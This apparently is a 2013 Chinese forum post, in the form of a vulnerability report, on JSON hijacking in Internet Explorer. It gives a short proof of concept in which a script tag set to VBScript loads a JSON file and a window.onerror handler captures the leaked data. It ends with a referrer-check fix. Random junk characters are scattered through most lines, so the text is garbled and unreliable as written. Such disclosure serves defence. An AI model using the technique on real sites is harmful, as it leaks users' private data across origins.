简要描述:+ x- d6 Z2 g: n4 T4 g( ?
) S/ O' ^1 s" V4 D
由于某些资源容器对数据处理不当导致json劫持漏洞.) U' ^* G& O9 F
详细说明:
6 Q6 h. V! q% n: J由于ie支持vbscript,所以script元素可以指定成vbscript语言:2 U; _* z: C# A
<script language=vbscript></script>6 K1 X8 }6 T+ |
" j( V9 z/ r. ?当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据. C4 ]/ c. V% |) u
漏洞证明:& _9 J$ `, \& S I% ]+ _8 Y
<script>/ | J- n/ C: a- T; g. Z2 W
window.onerror=function(_){
) V' d; \& u8 H! m4 u$ W% xalert(_), x' s+ w$ T1 N
}
- J. {, y" w/ ` X7 f) [</script>
; m# ?/ z1 v. Q( m+ J<script language=vbscript src=1.json></script>/ M# Q$ f8 x, K
2 _: i" p, f2 ^# X' Y2 L: t; n
% v# o% t& S. i) V# C
1.json:
5 A, F3 V e0 H3 H5 y7 { z[{"name":"sogili","age":19}]$ z$ U: u" S s( _
修复方案:
: i6 T+ w3 N& c5 y) ~4 H网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
分享
支持
反对